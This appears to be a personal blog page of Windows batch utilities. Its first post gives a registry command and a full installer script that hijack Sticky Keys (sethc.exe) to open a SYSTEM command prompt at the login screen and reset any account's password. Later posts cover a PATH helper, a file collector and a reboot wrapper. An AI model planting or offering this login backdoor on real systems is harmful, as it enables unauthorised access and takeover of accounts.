Saturday, February 21, 2015

Windows Login Backdoor Creator V2.0

Note: This is a revision of the original post 'Creating backdoor at Windows login to reset password after losing it.' found here.

Over the years I have had many people ask me how to get into their computer after they have forgotten their password. There are a few ways to do this either with a bootable cd or usb stick with a 3rd party application, but to be honest this is very unsafe as anyone can get the cd and break into a computer and at the same time you or anyone else that uses such software can cause users or admins to lose data.

The only really safe way to do it is through your command prompt, but without knowing your password to get into the profile to use the console then you are screwed. Recently I have discovered a way to be able to access your command prompt from the Windows login screen by adding a value to the registry. Now you can create a registry file (.reg) to do this, but today we will just add it via the command prompt:


1. You must open your cmd (command prompt) as administrator so you can't open it from run. You must go to your start screen type "cmd" in the search bar and when you see it right click on it and select "Run as administrator".

2. Type the code below into the prompt:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Triple click on the above code to select all then copy and paste into your command prompt and hit "ENTER".

You now have access to the the command prompt at the Wcndows login screen.

Gain access by either:

  • Pressing SHIFT+ALT+PRTSC (Print Screen) or;
  • Hitting the SHIFT key 5 times in a row (good ol' Sticky Keys).



If you or anyone else on your Windows OS ever loses their password (or you just want to do anything else that you can do from the prompt) you can do it without logging in (be careful though!).

3. When you need to change your password from the prompt, type:
net user username password
Where username is, of course, your username and password your new password.

EXAMPLE:
net user bob apples
Would change user bob's password to apples etc...

If your name has a space in it you must wrap quotation marks around the name as a space denotes a new command. You must enter it like:

net user "bob for" apples


4. Login with your new password!



Downloads:

New version 2.0 is 90% re-written with 32 and 64 bit versions to accommodate x86 issues.

    Version Info
  • V1.0 - Original, batch script only. Bugs: Batch quote issue in paths, installs to wrong path on x86 systems with SysWOW. Bug fixes: none.
  • V2.0 - New re-write, 32 and 64 bit executables. Bugs: No known bugs. Bug fixes: Fixed batch quotes in paths issue, fixed install wrong locations issue.
      Features
    • Checks for registry value and script file and either installs the backdoor or fixes any part that may be broken.
    • Now runs great on Windows XP/Vista/7/8 32 and 64 bit.
I have created a batch file to automate this process so you don't have to do half of this. You can either download it here (Outdated V1.0 old script for archives) or if you are scared of downloading files you can just copy and paste the text below into a batch you create.

  • Right click on your desktop and select New>TXT File.
  • Rename the file from "New Text Document.txt" to "whateveryouwant.bat" (if you can't see the extension just go into folder options and uncheck "Hide extensions of known applications" or something like that.
  • Once it's a bat file right click on it and select "Edit". and paste the code below into it and save the file
  • Right click on the bat file you have created and select "Run as administrator" and it will run.
Code to paste in your batch file:
@echo off
Title Windows Login Backdoor Creator
color 0A
set "_bscript=%windir%/System32/backdoor.cmd"
cls
mode 54,4
echo(
echo Checking to see if script or registry value exist...
echo(
call :to
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger>nul
cls

if [%errorlevel%]==[1] if not exist "%_bscript%" (
call :notFound
cls
call :howTo
call :md
goto :eof
)

if [%errorlevel%]==[0] if not exist "%_bscript%" (
mode 49,5
echo(
echo Registry value exists, but the script does not.
echo Writing script file now...
echo(
call :to
call :writeScript
cls
call :howTo
call :md
goto :eof
)

if [%errorlevel%]==[1] if exist "%_bscript%" (
mode 49,5
echo(
echo Script exists, but the registry value does not.
echo Writing registry value now...
echo(
call :to
call :writeReg
cls
call :howTo
call :md
goto :eof
)
mode 48,5
echo(
echo Both the script and registry value were found,
echo no need to do anything.
echo(
pause
call :md
goto :eof

:notFound
mode 45,5
echo(
echo Backdoor was not found, writing both the
echo regsitry value and the script file....
echo(
call :to
call :writeBoth
cls
exit /b

:writeBoth
call :writeReg
call :writeScript
exit /b

:writeReg
echo(
echo Creating registry key....
echo(
call :to
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
exit /b

:writeScript
mode 55,4
echo(
echo Creating script^: %_bscript%...
echo(
call :to
if exist "%_bscript%" del "%_bscript%"
echo Creating backdoor.cmd file...
echo @echo off > %_bscript%
echo title Creat New User Password >> %_bscript%
echo echo Enter username to reset your password: >> %_bscript%
echo set name= >> %_bscript%
echo set pass= >> %_bscript%
echo set /P name="Username:" >> %_bscript%
echo set /P pass="New Password:" >> %_bscript%
echo net user "%%name%%" "%%pass%%" >> %_bscript%
echo timeout /t 3 ^>NUL >> %_bscript%
echo exit >> %_bscript%
exit /b

:howTo
mode 36, 10
echo To run:
echo(
echo At the login screen either press
echo shift+ctrl+printscreen (or prtsc)
echo or hit shift 5 times. This will
echo bring up the command prompt. At
echo the prompt type "backdoor" into
echo the new password screen and follow
echo the instructions.
echo(
pause
cls
exit /b

:to
timeout /t 3 >nul
exit /b

:md
color 0F
mode 80,25
exit /b

New icon I made for it:

 photo green-backdoor_zps376b76e9.png

Once it starts it will enter the registry entries as provided above to create the access to the command prompt at Windows login and it will also create a batch file located in you System32 fold called "backdoor.bat" which will start you through an automated easy process to change your password, so no need to type the commands yourself just run the backdoor file. This batch files is run from your command prompt by typing "backdoor" or "backdoor.bat" and it

  • Run this batch file from the command prompt bay typing "backdoor" or "backdoor.bat" and hit "Enter".
  • It will easily guide you through the process of changing your password in just a couple of steps
Again, login and enjoy!!!

Tuesday, February 17, 2015

WinBin V1.0

WinBin V1.0

No matter what OS you use, if you use any console or command line interface then you know that if your script or executable isn't in a path the computer can read or if the cli is not in the direct path of the said file then it can not be run/found.

In most Linux systems there is a user bin system usually located in $HOME/bin where you can drop any of your user installed programs or scripts and they can be run form the terminal just like any system command.

In Windows it's not so simple (although, not so hard either) as any path read by Windows must be declared in the PATH(%PATH%) variable.

The problem with Windows is that the preset paths are all in system folders and there can be some permission and security issues with some utilities you may use. So it is best to just stay away from system folders when possible. The way to do this is by adding a custom directory designated for the user and adding the directories location to the PATH variable.

For example I create a directory: C:\Bin and then enter this location into the variable from cmd this: setx /m PATH "%PATH%;C:\Bin". And now I can drop whatever scripts or executable into the C:\Bin folder and run them from anywhere on the computer from cmd or any other cli.

Automate

I do this on every Windows rig I have and so I have created a quick bat to exe script to automate this process with slight error checking. WinBin V1.0 when started will check for a Bin folder and if exist warns the user that the old folder should be moved or deleted to complete the process. If no folder is found it continues to add the new directory and adds the location to the PATH variable. It then checks to makes sure the two functions were executed successfully and if so you can then use the system, if not you either have two many characters in your PATH variable (usually mostly from installed software) or the folder wasn't created successfully.

Usage

After the system is installed successfully then just drop anything at all that can be run from a cli into the C:\Bin folder and run from the cli!!! Very simple and quick and portable!

Download:

Icon I created

 photo WinBin_zpsae822e61.png

Tuesday, February 10, 2015

Collector V1.1

Collector (V1.1 - Updated)

Like most people I am constantly downloading files and installing software to my computer and because, like most people, I am busy all the time I don't have as much time as I would like to keep my system clean and so I like to write scripts to automate as much as I can to give me more free time away from my computer.

Over the years after cleaning, optimizing and fixing countless computers I have learned that most files that eat up disk space that can comfortably be removed are usually media and installation files; things you download from the internet pretty much. Lots of archived files like zips, rars etc... can end up taking up lots of space and even the most organized of us end up having files spread throughout our system and half the time we forget about them.

Recently I wrote a script (Collector V1.1) to copy all files of specific passed extension types to a folder on the desktop so that I can easily analyze the total file size of all said files. Doing this I also found files I forgot I even had and files I knew could be deleted I found the source files and deleted. I have converted my script to exe for easy portability and an administrative manifest.

Collector V1.1 is a command line utility (cli/clu) used by passing file extensions to it via a command line such as MS-DOS CMD.
E.g.:
collect.exe pdf txt log
will search your whole computer for all files with those extensions and then copy them to individual folders inside of a folder on your desktop named "Collection". There is no limit to the amount of passed extensions as it shifts each to %1 until [%1]==[].


Note: As with all bat to exe conversions this might come up as a false positive in your AV, just exclude in your AV. The collect.exe file must be placed in a folder that can be read from %PATH% such as C:\Windows\System32 or if you've added your own custom paths. You can also just cd to the path of your stored collect.exe.

Version Info:

  • Version 1.0 - Initial release. No known bugs.
  • Version 1.1 - Add log file with locations of original files.

Download:

Original Code:


@echo off
set "backd=%cd%"
title Collect Files
cls

:loop
mode 78,4
if [%1]==[] (
call :err
if exist "%mainf%" start "" explorer "%mainf%"
goto :eof
)

set "efile=%1"
set "mainf=%userprofile%\Desktop\Collection\"
set "wdir=%mainf%%efile%\"

cd C:\
echo(
echo Copying all "%efile%" files to %wdir%
echo(
for /r %%i in (*.%efile%) do (xcopy "%%i" "%wdir%" /q /y) >nul 2>nul
cls
cd %backd%
shift
goto :loop

:err
color FC
mode 38,4
cls
echo(
echo No more files to process...
echo(
pause
cls
color 0F
mode 80,25
title %backd%
exit /b

collector

Friday, February 6, 2015

Reboot for Windows - Linux Alternative

Windows Reboot V1.0

A lot of us who use both Windows and Linux find Windows cli commands lacking at times. Linux is best ran by the command (terminal) line in my opinion and almost everything you can do on a computer in Linux can and should be done via the terminal. One of the most annoying things I have found in Windows is the horrible way you have to reboot your computer from Windows CMD. In Linux it's as simple as typing 'reboot'.


In Windows in order to reboot your computer from a command line you must type 'shutdown /r /t 0' to reboot your computer. While this comes in handy for some things it is annoying for normal every day usage. I have created a batch to exe (for portability and easy use with administrative priveledges) script to emulate this feature in Windows. Simply place the reboot.exe in your C:\Windows\System32\ or any path in Windows %PATH% variable and run from command line with 'reboot'.


The difference between Linuxs 'reboot' and my Windows version is that an amount of time to wait before reboot can be passed to it as you would any passed parameter:
reboot 30
will wait 30 seconds before the reboot.


This is available in 3 versions; the original cmd script, reboot with admin manifest and a reboot without admin manifest (rename to reboot) for use on public computers:

Orignal script:

@echo off

if [%1]==[] (
call :restart
) else (
set rt=%1
call :passed
)

goto :eof

:passed
shutdown /r /t %rt%
exit /b

:restart
shutdown /r /t 0
exit /b